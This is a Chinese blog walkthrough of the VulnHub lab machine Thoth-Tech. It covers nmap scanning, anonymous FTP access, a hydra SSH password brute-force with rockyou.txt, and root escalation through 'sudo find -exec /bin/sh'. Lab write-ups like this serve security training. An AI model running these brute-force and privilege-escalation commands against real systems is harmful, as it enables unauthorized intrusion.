vulnhub靶机Thoth-Tech

下载地址:https://download.vulnhub.com/thothtech/Thoth-Tech.ova

主机发现

arp-scan -l

目标:192.168.21.148

端口扫描

nmap --min-rate 10000 -p- 192.168.21.148

服务扫描

nmap -sV -sT -O -p21,22,80 192.168.21.148

漏洞扫描

nmap --script=vuln -p21,22,80 192.168.21.148

先去看web网站

在f12里面发现

再去看看web的别的

感觉少了点东西于是又扫了一遍

nmap -A 192.168.21.148

发现ftp能匿名登入

去看看(用户名anonymous

ftp 192.168.21.148

这里告诉我们pwnlab能爆破

hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt ssh://192.168.21.148

ssh登入

ssh pwnlab@192.168.21.148

第一个flag

信息收集

10和11是我执行的发现有find

这里用find找可执行的文件

find / -user root -perm /40000 2>/dev/null

没有东西

再看看sudo

find没有密码要求,那么就需要利用这个来提权了

find 命令提权 - 编程猎人 (programminghunter.com)

sudo find . -exec /bin/sh \; -quit

结束

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

himobrinehacken

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值